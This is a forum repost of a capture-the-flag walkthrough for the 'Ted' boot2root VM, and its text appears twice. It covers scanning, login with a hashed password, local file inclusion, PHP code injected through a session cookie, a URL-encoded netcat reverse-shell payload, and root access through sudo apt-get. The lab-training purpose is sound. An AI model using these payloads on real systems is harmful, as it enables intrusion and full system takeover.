othman
Link Outreach Guru
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
500 XP
Today we are going to take a new challenge, Ted. The credit for making this VM machine goes to “Avraham Cohen” and it is a boot2root challenge where we have to root the server to complete the challenge. You can download this VM here
Security Level: Beginner
Penetrating Methodology:
Scanning
Enumeration
Exploitation
Privilege Escalation
Walkthrough:
Scanning:
First thing first, scan the vulnerable machine using nmap
Here we found that the only port open is port 80
Let’s take a look at what the port 80 has to offer, we open the IP address in the browser and we found a login page
Enumeration
We tried to attempt some common default passwords but remain unsuccessful, but found something different. There is no error message displayed on the webpage, when we took a look at the response in burp-suite we found that the response asks us to provide the password in hash form
Now we know how to supply but don’t know which specific hashing algorithm. So we tried multiple algorithms like MD5, MD4, SHA-1, RIPEMD, etc. And found that SHA-256 is the correct algorithm and it worked for hash value of admin as password.
Once logged in, we found a simple file browser which helps in reading files from the file system of the target environment. We tried to read the contents of /etc/passwd and it displayed the contents
As the file browser works as a File Inclusion module in the current web environment, we tried to exploit the File Inclusion module with Remote File Inclusion vulnerability but failed.
Then we tried to read various critical files but were only able to read files not of much worth, except the session details which are stored in the file system of the server in the following way
Here we found that all the session cookies and their values are stored in the session file of the user
We tried exploiting user_pref cookie by inputting a small php code to get the output of the ifconfig command
The code we are trying to inject is
After encoding. the characters in URL encoding, the code looks something like this
Exploitation
As we found that we are able to create a Remote Code Execution vulnerability, let’s try to get a netcat reverse shell
The php code we tried looks something like this
After encoding into URL Encoding, the code looks something like this
Privilege Escalation
Once receiving a reverse shell, all we have to do is get the privilege escalated. After spawning a tty shell, we tried to check for sudo permissions of the current user(www-data)
Here we found that we can run the apt-get command with sudo privileges, let’s do that
You can find more details about privilege escalation through APT here
Author: Deepanshu is a Certified Ethical Hacker, Security Researcher, Pentester and Trainer at Ignite Technologies. Contact here
Security Level: Beginner
Penetrating Methodology:
Scanning
- Netdiscover
- NMAP
Enumeration
- Browsing the website
- Burpsuite
Exploitation
- Netcat
Privilege Escalation
- Sudo permission for the apt-get command
Walkthrough:
Scanning:
First thing first, scan the vulnerable machine using nmap
Code:
nmap -p- -A 192.168.1.10
Here we found that the only port open is port 80
data:image/s3,"s3://crabby-images/3c8bb/3c8bbeb1190b4337d199e89232d259270f752c4c" alt="1.png"
Let’s take a look at what the port 80 has to offer, we open the IP address in the browser and we found a login page
data:image/s3,"s3://crabby-images/493cd/493cdc25408c307385a6ea80c8629b1a84fd01ec" alt="2.png"
Enumeration
We tried to attempt some common default passwords but remain unsuccessful, but found something different. There is no error message displayed on the webpage, when we took a look at the response in burp-suite we found that the response asks us to provide the password in hash form
data:image/s3,"s3://crabby-images/64ab8/64ab8b03ec80277e32a03b40a2120227dd99db28" alt="3.png"
Now we know how to supply but don’t know which specific hashing algorithm. So we tried multiple algorithms like MD5, MD4, SHA-1, RIPEMD, etc. And found that SHA-256 is the correct algorithm and it worked for hash value of admin as password.
Once logged in, we found a simple file browser which helps in reading files from the file system of the target environment. We tried to read the contents of /etc/passwd and it displayed the contents
data:image/s3,"s3://crabby-images/91cee/91cee515f14a1d3d784c2e548640220047fc5aa9" alt="4.png"
As the file browser works as a File Inclusion module in the current web environment, we tried to exploit the File Inclusion module with Remote File Inclusion vulnerability but failed.
data:image/s3,"s3://crabby-images/cb7dc/cb7dcc9ce868fb6be555ab0f61451b8ef20b8418" alt="5.png"
Then we tried to read various critical files but were only able to read files not of much worth, except the session details which are stored in the file system of the server in the following way
Code:
/var/lib/php/sessions/sess_<php session id>
Here we found that all the session cookies and their values are stored in the session file of the user
data:image/s3,"s3://crabby-images/46eaf/46eafcb4f477d975310968e2268397768dca89dc" alt="6.png"
We tried exploiting user_pref cookie by inputting a small php code to get the output of the ifconfig command
The code we are trying to inject is
Code:
<?php system("ifconfig")?>
After encoding. the characters in URL encoding, the code looks something like this
Code:
%3c%3fphp%20system%28%22ifconfig%22%29%3f%3e
data:image/s3,"s3://crabby-images/bc452/bc452aa1afb5be7739d59ae55cb6a9df0c67aaf5" alt="7.png"
Exploitation
As we found that we are able to create a Remote Code Execution vulnerability, let’s try to get a netcat reverse shell
The php code we tried looks something like this
Code:
<?php system("nc 192.168.1.7 1234 -e /bin/bash")?>
After encoding into URL Encoding, the code looks something like this
Code:
%3c%3fphp%20system%28%22nc%20192.168.1.7%201234%20-e%20%2fbin%2fbash%22%29%3f%3e
data:image/s3,"s3://crabby-images/5fe9e/5fe9e2851e20790a90c8bbb9f196e8b66497d5ca" alt="8.png"
Privilege Escalation
Once receiving a reverse shell, all we have to do is get the privilege escalated. After spawning a tty shell, we tried to check for sudo permissions of the current user(www-data)
Code:
sudo -l
Here we found that we can run the apt-get command with sudo privileges, let’s do that
Code:
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
You can find more details about privilege escalation through APT here
data:image/s3,"s3://crabby-images/28f11/28f1140039d827b338d3c71c01a11468f8f6dc65" alt="9.png"
Author: Deepanshu is a Certified Ethical Hacker, Security Researcher, Pentester and Trainer at Ignite Technologies. Contact here